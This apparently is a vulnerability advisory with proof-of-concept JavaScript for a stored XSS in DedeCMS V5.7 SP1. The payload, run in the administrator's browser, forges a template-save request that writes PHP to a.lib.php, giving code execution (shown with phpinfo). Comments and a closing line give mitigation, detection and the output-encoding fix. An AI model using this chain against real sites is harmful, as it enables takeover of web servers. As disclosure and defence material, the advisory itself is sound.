A stored XSS in DedeCMS can be used against an administrator (CSRF); getshell was tested successfully.
DedeCMS-V5.7-UTF8-SP1 stored XSS can hit the administrator and getshell (tested successfully). Register an account, then log in. JS code:
// Payload shown in the advisory: once stored in a tag and rendered unencoded
// in the admin back-end, it runs in the administrator's browser and issues a
// same-origin POST to dede/tpl.php. The browser attaches the admin's session
// cookie to that request on its own, which is what makes the CSRF step work.
// Mitigation, beyond the output encoding the advisory proposes: an anti-CSRF
// token checked by the savetagfile action, and SameSite session cookies.
// Detection: a POST to dede/tpl.php with action=savetagfile whose Referer is
// a content page rather than the template editor is a strong indicator.

// Returns an XHR object: native XMLHttpRequest, or a legacy ActiveX fallback.
// Note: the fallback loop has no `break`, so the last ProgID that constructs
// successfully wins; `request` stays `false` if none does.
function ajax(){
  var request = false;
  if(window.XMLHttpRequest) {
    request = new XMLHttpRequest();
  } else if(window.ActiveXObject) {
    var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
    for(var i=0; i<versions.length; i++) {
      try {
        request = new ActiveXObject(versions[i]);
      } catch(e) {} // failed ProgIDs are ignored; the loop keeps going
    }
  }
  return request;
}

// Fires as soon as the injected script is parsed; postgo is a hoisted
// function declaration, so calling it before its definition is valid.
var _x = ajax(); postgo();

// Builds and sends the forged template-save request.
// `src` and `data` are assigned without `var`, so they become implicit
// globals. The `content` field URL-decodes to `<?php\r\nphpinfo();\r\n?>`;
// `filename` is the target a.lib.php; `B1` is the URL-encoded submit-button
// value (UTF-8, appears to be the "save" label).
function postgo() {
  src="http://10.65.100.235/DedeCMS-V5.7-UTF8-SP1/uploads/dede/tpl.php";
  data="actiondo=edittag&action=savetagfile&filename=a.lib.php&content=%3C%3Fphp%0D%0Aphpinfo%28%29%3B%0D%0A%3F%3E&B1=++%E4%BF%9D+%E5%AD%98++";
  xhr_act("POST",src,data);
}

// Sends a synchronous request (third arg to open() is `false`) using the
// shared `_x` object and returns the response body.
// `cookie` is another implicit global. The explicit Cookie header is a
// no-op in browsers — Cookie is a forbidden request header for XHR — so the
// admin session rides along only because the browser adds it automatically
// to a same-origin request. `_m=="POST"` uses loose equality.
function xhr_act(_m,_s,_a){
  _x.open(_m,_s,false);cookie = document.cookie;
  if(_m=="POST"){_x.setRequestHeader("Content-Type","application/x-www-form-urlencoded");_x.setRequestHeader("Cookie",cookie);}
  _x.send(_a);
  return _x.responseText;
}
To run the test, we create a test tag in advance with blank TAG content. Our JS code then writes phpinfo() to a.lib.php:
Finally, we access DedeCMS-V5.7-UTF8-SP1/uploads/include/taglib/a.lib.php; there is no restriction, and we can see directly that phpinfo is executed.
Solution: apply HTML encoding to all output.